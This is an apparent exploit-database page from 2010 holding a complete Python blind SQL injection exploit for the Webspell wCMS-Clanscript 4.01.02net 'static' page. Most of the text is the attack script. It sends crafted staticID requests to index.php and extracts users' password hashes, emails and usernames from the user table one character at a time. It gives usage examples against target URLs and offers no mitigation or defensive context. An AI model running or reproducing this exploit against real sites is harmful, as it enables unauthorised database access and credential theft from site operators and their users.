[webapps / 0day] - Webspell wCMS-Clanscript4.01.02net<= s
Posted on 29 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 29 Sep 2010 | Exploit category: webapps / 0day | Exploit author: Easy Laster | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>====================================================================== Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection ====================================================================== #----------------------------Information------------------------------------------------ #+Autor : Easy Laster #+ICQ : 11-051-551 #+Date : 29.09.2010 #+Script : Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Exploit #+Price : $00,00 #+Language :PHP #+Discovered by Easy Laster #+code by Dr.ChAoS #+Security Group Undergroundagents,Free-hack and 4004-Security-Project #+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, #Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, #N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco, #and all member from free-hack.com. #--------------------------------------------------------------------------------------- #!/usr/bin/env python #-*- coding:utf-8 -*- import sys, urllib2, getopt def out(str): sys.stdout.write(str) sys.stdout.flush() def read_url(url): while True: try: src = urllib2.urlopen(url).read() break except: pass return src class Exploit: charset = "0123456789abcdefABCDEF" url = "" charn = 1 id = 1 table_prefix = "webs_" table_field = "" passwd = "" columns = [] find_passwd = True def __init__(self): if len(sys.argv) < 2: print "*****************************************************************************" print "*Webspell wCMS-Clanscript4.01.02net static&static Blind SQL Injection Exploit*" print "*****************************************************************************" print "* Discovered and vulnerability by Easy Laster *" print "* coded by Dr.ChAoS *" print "*****************************************************************************" print "* Usage: *" print "* python exploit.py [OPTION...] [SWITCH...] <url> *" print "* *" print "* Example: *" print "* *" print "* Get the password of the user with id 2: *" print "* python exploit.py --id 2 http://site.de/path/ *" print "* *" print "* Get email, username and password of id 1: *" print "* python exploit.py --columns 80:1:email,25:5:username http://site.de/ *" print "* *" print "* Switches: *" print "* --nopw Search no password *" print "* *" print "* Options: *" print "* --id <user id> User id *" print "* --prefix <table prefix> Table prefix of ECP *" print "* --charn <1 - 32, default = 1> Start at position x *" print "* --columns <max_chars:charn:column,...> Get value of any column you want *" print "*****************************************************************************" exit() opts, switches = getopt.getopt(sys.argv[1:], "", ["id=", "prefix=", "charn=", "columns=", "nopw"]) for opt in opts: if opt[0] == "--id": self.id = int(opt[1]) elif opt[0] == "--prefix": self.table_prefix = opt[1] elif opt[0] == "--charn": self.charn = int(opt[1]) elif opt[0] == "--columns": for col in opt[1].split(","): max, charx, name = col.split(":") self.columns.append([int(max), int(charx), name, ""]) elif opt[0] == "--nopw": self.find_passwd = False for switch in switches: if switch[:4] == "http": if switch[-1:] == "/": self.url = switch else: self.url = switch + "/" def valid_page(self, src): if "http://www.wookie.de/images/baustelle.gif" not in src: return True else: return False def generate_url(self, ascii): return self.url + "index.php?site=static&staticID=1%27+and+ascii(substring((SELECT%20" + self.table_field + "%20FROM%20" + self.table_prefix + "user+WHERE+userid=" + str(self.id) + ")," + str(self.charn) + ",1))%3E" + str(ord(ascii)) + "--+" def start(self): print "Exploiting..." if self.find_passwd: charx = self.charn self.password() if len(self.columns) > 0: self.read_columns() print "All finished! " print "------ Results ------" if len(self.columns) > 0: for v in self.columns: print "Column "" + v[2] + "": " + v[3] if self.find_passwd: if len(self.passwd) == 32 - charx + 1: print "Password: " + self.passwd else: print "Password not found!" print "---------------------" def read_columns(self): end = False charrange = [0] charrange.extend(range(32, 256)) for i in range(len(self.columns)): out("Getting value of "" + self.columns[i][2] + "": ") self.table_field = self.columns[i][2] self.charn = self.columns[i][1] for pwc in range(self.charn, self.columns[i][0] + 1): if end == True: break self.charn = pwc end = False for c in charrange: src = read_url(self.generate_url(chr(c))) if self.valid_page(src): if c == 0: end = True else: self.columns[i][3] += chr(c) out(chr(c)) break out(" ") def password(self): out("Getting password: ") self.table_field = "password" for pwc in range(self.charn, 33): self.charn = pwc for c in self.charset: src = read_url(self.generate_url(c)) if self.valid_page(src): self.passwd += c out(c) break out(" ") exploit = Exploit() exploit.start() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-29]</pre></body></html>
